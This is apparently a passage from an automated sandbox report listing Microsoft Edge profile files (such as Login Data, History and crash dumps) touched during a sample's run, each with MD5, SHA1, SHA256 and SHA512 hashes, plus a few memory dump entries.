| SHA512 | 8374a721ea3ff3a1ea70d8a074e5c193dbba27ba7e301f19cea89d648b2378c376e48310c33fe81078cd40b1863daec935e8ac22e8e3878dc3a5bb529d028852 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Local State
| MD5 | 8cd20f030c0e52c78f3b2d2bab082f29 |
| SHA1 | e924a0cf42468e929d7f50f43cb3d945b121c748 |
| SHA256 | 298c4855b050a936057d26220ccae2e2ea0a99e352e7d61aa98b1232d954f90b |
| SHA512 | cccbf4d26ae615c26bf22dc5b854b6e3d20669ece2f3ae09df32566c0b1de95f0cfc4a9da1d49cd2fdcf16e6f1905efcaa902188e3de8c8d90e1881738f4358f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Last Version
| MD5 | 838a7b32aefb618130392bc7d006aa2e |
| SHA1 | 5159e0f18c9e68f0e75e2239875aa994847b8290 |
| SHA256 | ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa |
| SHA512 | 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Secure Preferences
| MD5 | c57eb69e85f77828ed87a40eae0f7add |
| SHA1 | 4124c4874e5f5383eca737dd26309cb81841352e |
| SHA256 | c5ad6acae43eeb909035ffd0a9a61beb3d3fabbe6ef68eee89d389f5bb829d49 |
| SHA512 | 3398ba1997fe673172b3241b916457adeb0372d1213b6b6fc618492ca725b1135251bb353d00cd101cc381bac5908229a2afdc8d0b1adcd076f1b6cb22e913ac |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Login Data
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Web Data
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sessions\Tabs_13353438338878948
| MD5 | 7fcd0f5a1738a220266985ce13fe2239 |
| SHA1 | 925674da29c597c38e117d947b2e2d5b1617fd2f |
| SHA256 | 9cfdfa688fb53570e065b6c5a8429c69b0e2c410d52cc686edeaf90676f7e04b |
| SHA512 | 7ebb1dd239920b630460da580c241ab2ecf08357025da2a40a89ed54d29675b0e99e88707c89d0a0d8af885204f90ff02caa7b42aac12b91adb6931275847240 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | 47b2c6613360b818825d076d14c051f7 |
| SHA1 | 7df7304568313a06540f490bf3305cb89bc03e5c |
| SHA256 | 47a22bea2e7d0154c59bf5d8790ec68274eb05e9fa6cf0eab0d648121f1a02ac |
| SHA512 | 08d2366fc1ce87dbe96b9bf997e4c59c9206fcfea47c1f17b01e79aeb0580f25cac5c7349bb453a50775b2743053446653f4129f835f81f4a8547ca392557aac |
\??\pipe\LOCAL\crashpad_1932_ULJUGVYXBNEYDNLX
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\000003.log
| MD5 | 148079685e25097536785f4536af014b |
| SHA1 | c5ff5b1b69487a9dd4d244d11bbafa91708c1a41 |
| SHA256 | f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8 |
| SHA512 | c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\000003.log
| MD5 | 90881c9c26f29fca29815a08ba858544 |
| SHA1 | 06fee974987b91d82c2839a4bb12991fa99e1bdd |
| SHA256 | a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a |
| SHA512 | 15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Favicons
| MD5 | 71c47b8f44867d805fed290fb0a18f74 |
| SHA1 | a019b3329dd49f91ea94267f19de580c40c6ef67 |
| SHA256 | 13daa8fe29d46fda8acd97cacd7baecc700b2a8763538709f8282941b629865c |
| SHA512 | f35b779a06ef83496eb5adcd1ffeb20c144cc78ced2d923c5f87f9b9220b23c31a712b7518f691b58f65422a28b48ad569a43ee23936fa6445a9d8251a9658c7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Visited Links
| MD5 | 9109e330e97a971971eabc51e139e2a5 |
| SHA1 | 1784be19cb2001025503165d0ca336eb3ed1d21a |
| SHA256 | ec4fd5c50d2dab041a5e89bc4194f4adb3805cdcef8f3b6deb3e97e693b14957 |
| SHA512 | 07af0a7d45ae1d0b828a29e4624f559ae65843e7c02a4ae4a83b20c9ec6783cf5ab2e51f15808dcc0da3e1ad60b0699e1b410f0a55b6ddaf0d8e2fa05e8fb5ea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\LOG
| MD5 | b2f6ddf5a9c8144d3eaa5718eeac56fe |
| SHA1 | 374b570d8e9ccab570788712a5d09ca6145b8616 |
| SHA256 | a285c90649277e792af2b94fd75687e9d02bee3a0cb65ca9407b20c2e8a68f79 |
| SHA512 | a12a0f8a8b0053f2f5c4f31972535b638ccfb029bbce910921a632dfcef3ee73d2aa7bb6f444ebe3977c8cc27230a26f0c4840223f12f48a1803dbb29d838b28 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\LOG.old
| MD5 | 7944ac4f945d91bf5d61e69475b18e4c |
| SHA1 | 81da808a01aaeb8144895b6ee9aac4359a27bc33 |
| SHA256 | e85b177c16c1ffee3747d60ff85ee1e57e1946f02796aa24e22944e2433e643b |
| SHA512 | 0af1141379fa833cc9dd58d6bf7f7f7664380688b0ff471a45ae020a92b41d4db270c0d847731a7fa872d03f23195aa5479c65f0b6e151a57dda537ac62c76b4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 8744fb59ea71b0a9603412deb911617a |
| SHA1 | 871f6a6a2ac14e5ce8cf9488495d052aca157e30 |
| SHA256 | 2e971f0e8e5fc83611c30d3e1fd28a7a3b92cc87372670f3233609f1236ee293 |
| SHA512 | 6d033ad15270bb08322d6c7efc594aeb1caf580290acce98f98b13637255ce5cfd945dde5aea4abdcf62d1d035cdf14947bcd02ceb71a35afc9dd381b79bfdf5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Code Cache\js\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\History
| MD5 | 9618e15b04a4ddb39ed6c496575f6f95 |
| SHA1 | 1c28f8750e5555776b3c80b187c5d15a443a7412 |
| SHA256 | a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab |
| SHA512 | f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\LOG
| MD5 | a9a64bc193520c3c58f8f18654ae0570 |
| SHA1 | 3bc0a66068838b3162752eeed9dc88d64dd72cc6 |
| SHA256 | 828d60475300c86f91cf31d815ac64109d6d41eea1968f842cde3f0918e1ceb5 |
| SHA512 | 827f6c104ec95e21fb630fcc338f96bef4f800bcb3919de300b3495e1908f661abc37fc3453108180b426fb9e299bece8faa40367cb9edc23d355303fc963072 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\LOG.old
| MD5 | fc721d46610716d6035eebc1ec5339e8 |
| SHA1 | 5fb55b017a44d9e3a43b2c36d34628de053c6f3d |
| SHA256 | 18812c1340dbf604777237f6022008e60e3b65aa1f1686d43a9d75a83a56a8fd |
| SHA512 | 8e79d120afea8d958d10c611742d73b40ebb0dfd77aac6617de5420117f33a993133ca76a0e89c40670163e40d71dad100029e692db26188b497923ed06af73b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences
| MD5 | c5740e2cdce08e815b0fa146576b117a |
| SHA1 | cd50fba2d6f8535471a4a08841967b8cd9d64c65 |
| SHA256 | 08431aa71de8c862b4744bdddbf6a2505b2705a4589e82c482f606a26fc478fd |
| SHA512 | 873e93a005b5603a4a421522bce344b9dabc785f631912bf981e34695a0cf2195cc135811e4064bebcf954a01a4984706bf3d000d3f072fba322fe4a815129d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\SmartScreen\local\warnStateCache
| MD5 | 3f66f244278461dd07a3feb77a17712f |
| SHA1 | 8d570b550699ad0f248ec98b5d678f54248c0a84 |
| SHA256 | 203ce5c7c1680c6e98f5ceca920e9d904122a9e26a743191e9b0fe1f6584ed60 |
| SHA512 | 8d4733222e2e0bbc18370055d0602d0389e7a562887e97b2e54073017ffea024e9b1341ed95e28883861ef5e0d4fa9d27ed0894912ffe167632aed2e4cf53e7d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\SmartScreen\local\download_cache
| MD5 | 24127606dac5cc6142848b0387a3afb6 |
| SHA1 | 2dd825cba2ded5f73de2f70d3056764788d6b3cd |
| SHA256 | 7680b8117dce679eaf37a1c4670506fda78781cfcd994295b5108db18fbbc3a8 |
| SHA512 | 0c37b62b580255716371554cd47a1d7aa15a92b5376ff66d42cacf1e2fd95c027e7f8781231c4b0d9ccc17521a94f1e719cfd2307853d6d7d72dd8155ba6868b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\History Provider Cache
| MD5 | a9851aa4c3c8af2d1bd8834201b2ba51 |
| SHA1 | fa95986f7ebfac4aab3b261d3ed0a21b142e91fc |
| SHA256 | e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191 |
| SHA512 | 41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Local Storage\leveldb\LOG
| MD5 | a6041aabb50c61d0184525eb6e857854 |
| SHA1 | 8cb3c553d5295cc88231a84a53efa8a9cd4ffb33 |
| SHA256 | 13310a17a50eae1f5601edb9182029d4f848920e8bce3c15116d079865be941e |
| SHA512 | ce6b561082104fb812dd7b791316682d70fce31c50432172b985f2ddcd41fbadd494b22868e8c5d13184c305f89adf535a58e73cac9600823436a7c4ea924119 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Local Storage\leveldb\LOG.old
| MD5 | d4039b185bc58feb09012f5ea6763ea6 |
| SHA1 | 98b150d7b4964d087dccdce53b3cfd493e76c3bd |
| SHA256 | 16cdd538c97ac7d0c9a1f7731b672705f50399b09e7c03997d8db28fc00eaf25 |
| SHA512 | 75c9c311b63103bf315ef3417e15c3bb3250078920f3bb3097612cda08a888f9ee6675d9552f3a42417e6fc8ad4f85dc8fc70b9b6b47350007cadd436c4fc23a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Top Sites
| MD5 | f44dc73f9788d3313e3e25140002587c |
| SHA1 | 5aec4edc356bc673cba64ff31148b934a41d44c4 |
| SHA256 | 2002c1e5693dd638d840bb9fb04d765482d06ba3106623ce90f6e8e42067a983 |
| SHA512 | e556e3c32c0bc142b08e5c479bf31b6101c9200896dd7fcd74fdd39b2daeac8f6dc9ba4f09f3c6715998015af7317211082d9c811e5f9e32493c9ecd888875d7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\load_statistics.db
| MD5 | 3321b02bc024fb5a6cd075375fbd8d03 |
| SHA1 | d6c82e943be01e8a3f558700f37ef0b4b2c6a97a |
| SHA256 | 1efcdd2c69107b34cf8636a3172323e4e879fcfaff009a000199423d9d9e3b45 |
| SHA512 | e052fb05e10b66f220b125b6352abe9afb0da6a1e90b9b18420d69ae3f7e38c1a261876330d8c8fe163c625881a59bf24123fcfb101ea540b6ecef1a7b16356d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\index
| MD5 | bdfb72631c3fc3f374d1606571688a74 |
| SHA1 | a3e6b8ada17f07d9e931eac1dbb1c574af5d1e0e |
| SHA256 | 40b064cf10a5f6bb65391d7cded1a4aa136d1bf6c7f92248448e214d0dd32880 |
| SHA512 | ed4d2fc5b8d38e181b1859e5655686e1adbfc6c5b9f5f1a9c890c44f4194fc4d66751bce598a698a4c293443b40d13cb2eb02c01096437f30166ab04c53bbf29 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_0
| MD5 | cf89d16bb9107c631daabf0c0ee58efb |
| SHA1 | 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b |
| SHA256 | d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e |
| SHA512 | 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\LOG
| MD5 | 1508bb7b5f1227ffbde8d8a70bca5a7f |
| SHA1 | c2a023847e1e34a3a49b7dc2b5a3d9da38759489 |
| SHA256 | 1a6254cc6471ba03bea563c3eb0aba80e3684f66a259219c7be73fe8082fb0ac |
| SHA512 | 36dba24c2b1162c115186f05724c1563949c2f329931a87f984fd93d91a37490982661a00a3aa0c46b9cdaa8e15d44c328294a96797d91cf0b97f4dad110a82e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\LOG
| MD5 | 2563390c4e4a8f22b14eaadba44d6b5c |
| SHA1 | c06c4aff051fd1553fea171a16c3cd0b15d96b18 |
| SHA256 | 0b048a07939da5c3e23d51bad663c9b36bc6e98c8d8733d01535c6d914e7b8b1 |
| SHA512 | eac36d2577d84cec7e8cead67f579044174d3a4db5dc105b0ebeab51396b31e63d2bb9deb825bced7b149bc0923f0cc4c604ab8c9315a558a4c5ab41d929f4dd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Session Storage\LOG
| MD5 | d898747688a407bad58761735576e28a |
| SHA1 | 20416f4cdded7fdc5ebc49dadc2d42c47a34b38a |
| SHA256 | 0319ceec36611642f05bf961e6d3e9c6d765e6e5dac4c34ed364993d1f3b28b1 |
| SHA512 | 4ae1292ebe89b282aa64098575137de56fb0c74379b53cacca69b9263a11fc4fe6e0abe5ae46ab390fa8451b3c0905772582274e5ec9b166ebea22f8f626db23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\000003.log
| MD5 | d21e0a58064b6969bbaa7cf6e1f3b2e6 |
| SHA1 | e9f658a210dc777cb83319b3d70988e2c50aa8e9 |
| SHA256 | abfbc1783fa7b03989bda76a6a28a89197dd91aeed2bf5c79c97ae15c432c68f |
| SHA512 | 3d8b3666feea739c485f6939938e047c98933336f5dfba68fe06f0605f7ccaa2218816a5f8fe55169f14bc22df55abba5adaccf07f3e29ce5f46e07c615ad9d8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences
| MD5 | a3d2cb34b8e4d37c05052761032168b5 |
| SHA1 | f77e227aa092d52595ff5a51ec7de4f39af55485 |
| SHA256 | 0e9abbdf54b1eff6cb6b1c35b818c359f7c33c3f95a828909440b6787db4a74c |
| SHA512 | 92a7641d73cf67c31d70bbdbe1f62b391d6806ab8e4b82218de6679dc4dd930809aa83b90cd84fa6ecb438f2313fb2c4fde5aec3537f72ee8bd1b6ed8089ab60 |
memory/3828-291-0x0000000074FF0000-0x00000000757A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\17ef7bc2-fdbe-42b6-95d5-7488ca6d88d2.dmp
| MD5 | 14160a0118ab6e69f2fe8cd53c4c474c |
| SHA1 | 73bf0a01af3d41f3174e96f676d036ebfacecbcb |
| SHA256 | 13524884118f6285d9c12e82b2ccfec6c7105ecaf6d8ae5e363dd79dcd1cdd0c |
| SHA512 | a92d0ef8d491b16798bf8f9e05e7cb0d88049628b25890e9aee90b4b62562130069b4af1c5242a8298ca6d93963aad8cae3f3168687e4f183644da0b7bb3d85a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | 7611406137724e7cec16c399c7c2f034 |
| SHA1 | a4b080c150fc8f1005d7756973b9ec32caa3f000 |
| SHA256 | cd99c23894b278e6976d200e92ce83211222f9bbfa145f12e36e4af939e919ae |
| SHA512 | 510154c0adcb00c1805b12c29c2e65c1ebfcc10d54920cfa4cc984c5eb95b20849788dca696017604c351302d098aa7c686e2ad88e33fa85585f7e85dbd2c2b1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata
| MD5 | 4167b8538f98aa1b836ff976f80505d0 |
| SHA1 | c2a5afc3a0767674175ea3777273408689904d6c |
| SHA256 | 206e817fb53b656bd7dd333b810583bcb59579ee8d1b3f96cb74aa79446c0d71 |
| SHA512 | 1d77feac2e8bcc579ba6bb3da5d21045ef5370273d23d0341bb7d93dd3fe88ab1780601cbe4f485ad4e8b134d3a396a7178c4a39f4fbcb895508ead964f38322 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\b26ad9aa-3214-4a47-8290-0b3a03d52f43.dmp
| MD5 | 44d18e42f1cc9954487f7177af98d673 |
| SHA1 | a9fd6836ae13429133b199becec052afebb3449c |
| SHA256 | a666802e6834f4a59e7ef3bb3b29683826bb946b9f0f8eaefda1a153f21fb12e |
| SHA512 | 40d943a20db5c71a862c236fbe444170e93103ffd1ebb7dce1659079a58c29760b803de4b3d399adff928927412524fdd3f476e652b8749a683767848c62e8f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\b7b5412c-0f31-4f68-b8d8-117c5a64cb06.dmp
| MD5 | 3d0adcb22f223126fa908aab79e27e34 |
| SHA1 | e38c6b987d08716e228d597244e6b3bbe062cfe7 |
| SHA256 | 0ea61e387861621e2d381771c03f1cc470892d2003f28af439f856fc7994575f |
| SHA512 | 6c2d157cce21df9465380b5d1606337bf06b9ab8aaf31b1e2f32b1c25308772c901d4ea5120fe8b150e417afd75aecb8cf065a9b1926a3a894cc18bfbd4c6c26 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | f35caa06e7b581d2eda3aecaa3e4d9f8 |
| SHA1 | 757e6b167c5b86e48f2d792eac9acff085ab010e |
| SHA256 | eafc63c4631f54dc53d6177c198f5624a241f5c9b65d6f8f2f406675b102fa64 |
| SHA512 | a71b014c9b3bf7b49f80ee48b164771da005f36bcef2cc9f73ed9123c07de0f9eeae6888556a60a87479cbeb847c902a69a38f13ccc76961b32a83e58551897b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\17c5331c-04e1-4394-bcf1-bc0f645a3a55.dmp
| MD5 | fccab65947dce323fdc2a9910af98143 |
| SHA1 | b3e71074ef7864965d563bd2a228e9231c2afc48 |
| SHA256 | d3526709aae4814b3999cda1ef36009db0d5597910719f12ca71abf5a0e61eb7 |
| SHA512 | 8985986ed5c355f9a7a928166e4be0abe20cdb3acc1cfd4e11a9e886e39dc2e282674ecb8d2d363e4e8e35d684463d4f5cdec6372ec9ca11dc822d7a8072b328 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\f2cad9a3-2f78-4692-bc1a-dccc604ddfcc.dmp
| MD5 | 4cb967e03898a6a807f0b13eb006db08 |
| SHA1 | 4f7245db20b731f1c1e2345087f9e96c90a41fc2 |
| SHA256 | 3efb0b7421c80257b66ddb71f6beb17d5e757fd40556fadd1a6dcd72b8a2e7ae |
| SHA512 | 6748c8483e3c060c5a2f0652f1959c428a7f5c8ced99b005878a6f0efc69368d25ffa272ff1f272ac205a9ad7a65657d500b7bd4bceef22f8493c9c052158898 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\31db489b-e828-4397-823c-0d0102b33cef.dmp
| MD5 | 9211e91210e00fa0f8b456127fd430eb |
| SHA1 | be9bb1d2720e6d03cf235578d85fac78b0d6ba7e |
| SHA256 | 3878ebbd79eb7d95e79c82fdcb2d8f9959bead1a97f2f9dc022a25042810b125 |
| SHA512 | 83a6a81641def9291b0aa22eef65155c389f1810efd2fb5648b654f56a2c42ab0b16bc44f408a97a2dea4594beb1d125f8edf7590403087a6b9a9fa26ddc0d19 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | 30a55320b8595b3bbbf1d571f3e7de69 |
| SHA1 | c2c2b21dae6bbd9985be46c29cc20ae799a58b50 |
| SHA256 | 0ed872a8f91315be9ea8cc0f19817fa70fc5341f485a3acfebc461fbf1cdc931 |
| SHA512 | 203926e6259494d5229796db10e4e7e3369edae1bcbddc06b93f075d5f00a3386adb263fd3b39582dc3b360bc1b4db5c63e484f6d7e315b6395708fba8fa7faa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\87f82129-5ead-48a2-b0e3-8ea1b8d6f770.dmp
| MD5 | 7763c65e0a973272b61650031a5236f0 |
| SHA1 | fe28857f691b4934398eb6495c640b50cabf1bbb |
| SHA256 | 9fd990648970d76a44a12dabd80f693470b3fa3b7a6bc588ed3a2f4fb52f6de7 |
| SHA512 | d7857e5ad588b18d008718762173e34d0bf3ed29421ab6e01e5821b1e05a14857914b42ebb56cd3d323ca8e47600cff84363d726e8aa91a505d754ff66e66aac |
memory/5112-630-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/5112-631-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences
| MD5 | c1aed8f08c873369cd546cab9d570454 |
| SHA1 | e62b8e98afdfb08adbee89a27e2f06fdca58a42c |
| SHA256 | 5b944599eedeb3f2112b0826e1bab52bd28fc028bee19f47b3403557ad76ece6 |
| SHA512 | d003ada4a2baf5667f3ca13808f657ac5bc355905835e96a6d4645bb3c139d7f6c301c68b4e3a8629c511e9bd45246ac95382cf2437b7dbd8d79bec83ceafd8e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\15bd52b7-d6ad-41f4-84b4-68f51e4ca23c.dmp
| MD5 | 1a45b8f4d7a315274a3cf0afbcb1ba2f |
| SHA1 | 34db9e1e5e5d21543a17877bd122beb82fb85902 |
| SHA256 | 329805f411c22d1509c685065bac8639f588550d0cbfd3350f1d7b254c331cd1 |
| SHA512 | dfbc3bdb8d64f06375ff84739da433c45534ae8b22cae24e7ab0858dd3c55442c08a428a250561afd476f7bb5da619ef153a82089be190f21f288b8c8ab7209d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | 4e040cfba3922536fe11f5778a81d553 |
| SHA1 | e5e37b0afa0af2f9397a8ba1835af29b5fc8222f |
| SHA256 | 92ff1f292a6f3bdbe2fa32213f4d0083de920a02c80c142f26174cccf0fc6a59 |
| SHA512 | c3a627abe191c1b713ac956ca0aafbf9674cf57a1531889357e698661f784ce2723ba2cfeaaa893aaafb06b6a87e039f23f301befe62bb1939925008017fcc71 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\2e768fa3-656f-4694-9c33-65a719f69bc5.dmp
| MD5 | 30c7f73799908750dd79bd9b010e153b |
| SHA1 | 7b9358263ed0502542f777a9c17bbbb06633b493 |
| SHA256 | 0505d3ffea0c6e5ab86bcceaae9bdfd2c7446ba1cb9a6f53eb4f179cc6fc86bd |
| SHA512 | 8ce0a69aa3a0f99362760ea227d0aae219f466b9328c2adddbddebfe7cb7b0686ed2d197fe6cd3e693e531b6a1693c243fd2cfe9d53cdaf002ae2a8bf8de2c29 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\25b62285-fbe9-4e7e-b851-72c00e743c76.dmp
| MD5 | c8fe20d3faa55ddac0ac073b0a2b17fa |
| SHA1 | ee56414654804465cf6ae30477b9564eb2869003 |
| SHA256 | bc7fa838563116d8599e405de8b4f447de0899b9d9a4c552afab27200ce36e36 |
| SHA512 | 6614d9c9940e52fe93ecffc851d6cdfba975158525f35753b34526bf56d9559072572fff14b43c1c7dfbf22f5a92834c7b7fb9af1f39ab75ad9f2cf80e0f3aef |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | 40058b362c5cc042b8ce03817ae3edd2 |
| SHA1 | 7a9eaa50781b6b68150cc3da634c8a92e6692368 |
| SHA256 | 04076c9c8e4b2fce6e2deddc444b13c8f3d477cc3a09fdfad05d0953b090bda6 |
| SHA512 | 78fd298c7f7e1368a760fd23c95d449d7a16c48c63707d5b41aeb686c5afe5513b30479bd9c92799c5fa61e7a027c1d66b5a13aad7827e79008b5c2f3d3421ab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\6885d9c7-2b7b-4d95-971b-ff6b17628fbf.dmp
| MD5 | 210e7b0ae2a4a5471de1f04367158644 |
| SHA1 | d69f64028a5ec9e8ce9cff6a229680c32aae03a6 |
| SHA256 | ae774636ff633d3c8ab389575b1d060a65dfdbc6bb365c4e89c92bedaffdfd97 |
